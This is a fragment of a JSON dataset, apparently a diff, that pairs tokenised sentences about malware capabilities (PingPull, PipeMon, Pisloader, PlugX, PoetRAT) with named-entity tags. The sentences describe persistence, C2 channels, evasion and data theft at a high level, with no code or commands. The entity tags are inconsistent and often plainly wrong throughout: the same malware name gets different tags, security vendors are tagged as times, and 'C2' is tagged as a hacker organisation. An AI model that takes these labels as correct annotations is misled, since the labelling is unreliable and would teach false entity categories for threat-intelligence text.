"a", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ping", + "can", + "be", + "used", + "to", + "identify", + "remote", + "systems", + "within", + "a", + "network." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PingPull", + "can", + "collect", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PingPull", + "can", + "decrypt", + "received", + "data", + "from", + "its", + "C2", + "server", + "by", + "using", + "AES." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PingPull", + "has", + "the", + "ability", + "to", + "exfiltrate", + "stolen", + "victim", + "data", + "through", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PingPull", + "can", + "enumerate", + "storage", + "volumes", + "and", + "folder", + "contents", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PingPull", + "can", + "mimic", + "the", + "names", + "and", + "descriptions", + "of", + "legitimate", + "services", + "such", + "as", + "`iphlpsvc`,", + "`IP", + "Helper`,", + "and", + "`Onedrive`", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SecTeam", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PingPull", + "variants", + "have", + "the", + "ability", + "to", + "communicate", + "with", + "C2", + "servers", + "using", + "ICMP", + "or", + "TCP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PingPull", + "can", + "use", + "HTTPS", + "over", + "port", + "8080", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PingPull", + "can", + "encode", + "C2", + "traffic", + "with", + "Base64." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PingPull", + "can", + "use", + "AES,", + "in", + "cipher", + "block", + "chaining", + "(CBC)", + "mode", + "padded", + "with", + "PKCS5,", + "to", + "encrypt", + "C2", + "server", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PingPull", + "can", + "retrieve", + "the", + "hostname", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PingPull", + "can", + "retrieve", + "the", + "IP", + "address", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PingPull", + "has", + "the", + "ability", + "to", + "timestomp", + "a", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "A", + "PingPull", + "variant", + "can", + "communicate", + "with", + "its", + "C2", + "servers", + "by", + "using", + "HTTPS." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PingPull", + "can", + "use", + "`cmd.exe`", + "to", + "run", + "various", + "commands", + "as", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PingPull", + "has", + "the", + "ability", + "to", + "install", + "itself", + "as", + "a", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "installer", + "can", + "use", + "UAC", + "bypass", + "techniques", + "to", + "install", + "the", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon,", + "its", + "installer,", + "and", + "tools", + "are", + "signed", + "with", + "stolen", + "code-signing", + "certificates." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "can", + "attempt", + "to", + "gain", + "administrative", + "privileges", + "using", + "token", + "impersonation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "can", + "decrypt", + "password-protected", + "executables." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "can", + "inject", + "its", + "modules", + "into", + "various", + "processes", + "using", + "reflective", + "DLL", + "loading." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "modules", + "are", + "stored", + "encrypted", + "on", + "disk." + ], + "ner_tags": [ + "B-SamFile", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "can", + "switch", + "to", + "an", + "alternate", + "C2", + "domain", + "when", + "a", + "particular", + "date", + "has", + "been", + "reached." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "has", + "stored", + "its", + "encrypted", + "payload", + "in", + "the", + "Registry", + "under", + "`HKLM\\SOFTWARE\\Microsoft\\Print\\Components\\`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "can", + "install", + "additional", + "modules", + "via", + "C2", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "modules", + "are", + "stored", + "on", + "disk", + "with", + "seemingly", + "benign", + "names", + "including", + "use", + "of", + "a", + "file", + "extension", + "associated", + "with", + "a", + "popular", + "word", + "processor." + ], + "ner_tags": [ + "B-SamFile", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "has", + "modified", + "the", + "Registry", + "to", + "store", + "its", + "encrypted", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon's", + "first", + "stage", + "has", + "been", + "executed", + "by", + "a", + "call", + "to", + "<code>CreateProcess</code>", + "with", + "the", + "decryption", + "password", + "in", + "an", + "argument.", + "PipeMon", + "has", + "used", + "a", + "call", + "to", + "<code>LoadLibrary</code>", + "to", + "load", + "its", + "installer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "PipeMon", + "communication", + "module", + "can", + "use", + "a", + "custom", + "protocol", + "based", + "on", + "TLS", + "over", + "TCP." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "can", + "use", + "parent", + "PID", + "spoofing", + "to", + "elevate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "PipeMon", + "installer", + "has", + "modified", + "the", + "Registry", + "key", + "<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows", + "x64\\Print", + "Processors</code>", + "to", + "install", + "PipeMon", + "as", + "a", + "Print", + "Processor." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "can", + "iterate", + "over", + "the", + "running", + "processes", + "to", + "find", + "a", + "suitable", + "injection", + "target." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "can", + "check", + "for", + "the", + "presence", + "of", + "ESET", + "and", + "Kaspersky", + "security", + "software." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "B-Time", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "has", + "used", + "call", + "to", + "<code>LoadLibrary</code>", + "to", + "load", + "its", + "installer.", + "PipeMon", + "loads", + "its", + "modules", + "using", + "reflective", + "loading", + "or", + "custom", + "shellcode." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "communications", + "are", + "RC4", + "encrypted." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "can", + "collect", + "and", + "send", + "OS", + "version", + "and", + "computer", + "name", + "as", + "a", + "part", + "of", + "its", + "C2", + "beacon." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "can", + "collect", + "and", + "send", + "the", + "local", + "IP", + "address,", + "RDP", + "information,", + "and", + "the", + "network", + "adapter", + "physical", + "address", + "as", + "a", + "part", + "of", + "its", + "C2", + "beacon." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "can", + "send", + "time", + "zone", + "information", + "from", + "a", + "compromised", + "host", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PipeMon", + "can", + "establish", + "persistence", + "by", + "registering", + "a", + "malicious", + "DLL", + "as", + "an", + "alternative", + "Print", + "Processor", + "which", + "is", + "loaded", + "when", + "the", + "print", + "spooler", + "service", + "starts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pisloader", + "uses", + "DNS", + "as", + "its", + "C2", + "protocol." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pisloader", + "has", + "commands", + "to", + "list", + "drives", + "on", + "the", + "victim", + "machine", + "and", + "to", + "list", + "file", + "information", + "for", + "a", + "given", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pisloader", + "has", + "a", + "command", + "to", + "upload", + "a", + "file", + "to", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pisloader", + "obfuscates", + "files", + "by", + "splitting", + "strings", + "into", + "smaller", + "sub-strings", + "and", + "including", + "\"garbage\"", + "strings", + "that", + "are", + "never", + "used.", + "The", + "malware", + "also", + "uses", + "return-oriented", + "programming", + "(ROP)", + "technique", + "and", + "single-byte", + "XOR", + "to", + "obfuscate", + "data." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pisloader", + "establishes", + "persistence", + "via", + "a", + "Registry", + "Run", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Responses", + "from", + "the", + "Pisloader", + "C2", + "server", + "are", + "base32-encoded." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Pisloader", + "has", + "a", + "command", + "to", + "collect", + "victim", + "system", + "information,", + "including", + "the", + "system", + "name", + "and", + "OS", + "version." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pisloader", + "has", + "a", + "command", + "to", + "collect", + "the", + "victim's", + "IP", + "address." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pisloader", + "uses", + "cmd.exe", + "to", + "set", + "the", + "Registry", + "Run", + "key", + "value.", + "It", + "also", + "has", + "a", + "command", + "to", + "spawn", + "a", + "command", + "shell." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "has", + "the", + "ability", + "to", + "use", + "DLL", + "search", + "order", + "hijacking", + "for", + "installation", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "has", + "used", + "DLL", + "side-loading", + "to", + "evade", + "anti-virus." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "can", + "be", + "configured", + "to", + "use", + "DNS", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "uses", + "Pastebin", + "to", + "store", + "C2", + "addresses." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "decompresses", + "and", + "decrypts", + "itself", + "using", + "the", + "Microsoft", + "API", + "call", + "RtlDecompressBuffer." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PlugX", + "has", + "a", + "module", + "to", + "enumerate", + "drives", + "and", + "find", + "files", + "recursively." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "can", + "modify", + "the", + "characteristics", + "of", + "folders", + "to", + "hide", + "them", + "from", + "the", + "compromised", + "user." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "has", + "a", + "module", + "to", + "download", + "and", + "execute", + "files", + "on", + "the", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "has", + "a", + "module", + "for", + "capturing", + "keystrokes", + "per", + "process", + "including", + "window", + "titles." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "version", + "of", + "PlugX", + "loads", + "as", + "shellcode", + "within", + "a", + ".NET", + "Framework", + "project", + "using", + "msbuild.exe,", + "presumably", + "to", + "bypass", + "application", + "control", + "techniques." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "one", + "instance,", + "menuPass", + "added", + "PlugX", + "as", + "a", + "service", + "with", + "a", + "display", + "name", + "of", + "\"Corel", + "Writing", + "Tools", + "Utility.\"" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "has", + "been", + "disguised", + "as", + "legitimate", + "Adobe", + "and", + "PotPlayer", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "has", + "a", + "module", + "to", + "create,", + "delete,", + "or", + "modify", + "Registry", + "keys." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "PlugX", + "can", + "use", + "the", + "Windows", + "API", + "functions", + "`GetProcAddress`,", + "`LoadLibrary`,", + "and", + "`CreateProcess`", + "to", + "execute", + "another", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "has", + "a", + "module", + "to", + "enumerate", + "network", + "shares." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "can", + "be", + "configured", + "to", + "use", + "raw", + "TCP", + "or", + "UDP", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "can", + "use", + "API", + "hashing", + "and", + "modify", + "the", + "names", + "of", + "strings", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "has", + "a", + "module", + "to", + "list", + "the", + "processes", + "running", + "on", + "a", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "can", + "enumerate", + "and", + "query", + "for", + "information", + "contained", + "within", + "the", + "Windows", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "adds", + "Run", + "key", + "entries", + "in", + "the", + "Registry", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "allows", + "the", + "operator", + "to", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "PlugX", + "can", + "use", + "RC4", + "encryption", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "checks", + "if", + "VMware", + "tools", + "is", + "running", + "in", + "the", + "background", + "by", + "searching", + "for", + "any", + "process", + "named", + "\"vmtoolsd\"." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PlugX", + "has", + "a", + "module", + "for", + "enumerating", + "TCP", + "and", + "UDP", + "network", + "connections", + "and", + "associated", + "processes", + "using", + "the", + "<code>netstat</code>", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "can", + "be", + "configured", + "to", + "use", + "HTTP", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "allows", + "actors", + "to", + "spawn", + "a", + "reverse", + "shell", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PlugX", + "can", + "be", + "added", + "as", + "a", + "service", + "to", + "establish", + "persistence.", + "PlugX", + "also", + "has", + "a", + "module", + "to", + "change", + "service", + "configurations", + "as", + "well", + "as", + "start,", + "control,", + "and", + "delete", + "services." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "the", + "ability", + "to", + "compress", + "files", + "with", + "zip." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "used", + "TLS", + "to", + "encrypt", + "command", + "and", + "control", + "(C2)", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "used", + "file", + "system", + "monitoring", + "to", + "track", + "modification", + "and", + "enable", + "automatic", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Tool", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "`pyminifier`", + "to", + "obfuscate", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "executed", + "a", + "Lua", + "script", + "through", + "a", + "Lua", + "interpreter", + "for", + "Windows." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "used", + "a", + "Python", + "tool", + "named", + "Browdec.exe", + "to", + "steal", + "browser", + "credentials." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "used", + "LZMA", + "and", + "base64", + "libraries", + "to", + "decode", + "obfuscated", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "was", + "delivered", + "with", + "documents", + "using", + "DDE", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "used", + "a", + ".NET", + "tool", + "named", + "dog.exe", + "to", + "exiltrate", + "information", + "over", + "an", + "e-mail", + "account." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "exfiltrated", + "data", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "used", + "ftp", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "the", + "ability", + "to", + "overwrite", + "scripts", + "and", + "delete", + "itself", + "if", + "a", + "sandbox", + "environment", + "is", + "detected." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "used", + "FTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "the", + "ability", + "to", + "list", + "files", + "upon", + "receiving", + "the", + "<code>ls</code>", + "command", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "the", + "ability", + "to", + "hide", + "and", + "unhide", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "the", + "ability", + "to", + "copy", + "files", + "and", + "download/upload", + "files", + "into", + "C2", + "channels", + "using", + "FTP", + "and", + "HTTPS." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "used", + "a", + "Python", + "tool", + "named", + "klog.exe", + "for", + "keylogging." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "used", + "voStro.exe,", + "a", + "compiled", + "pypykatz", + "(Python", + "version", + "of", + "Mimikatz),", + "to", + "steal", + "credentials." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "used", + "spearphishing", + "attachments", + "to", + "infect", + "victims." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "made", + "registry", + "modifications", + "to", + "alter", + "its", + "behavior", + "upon", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "used", + "TLS", + "to", + "encrypt", + "communications", + "over", + "port", + "143" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "used", + "a", + "custom", + 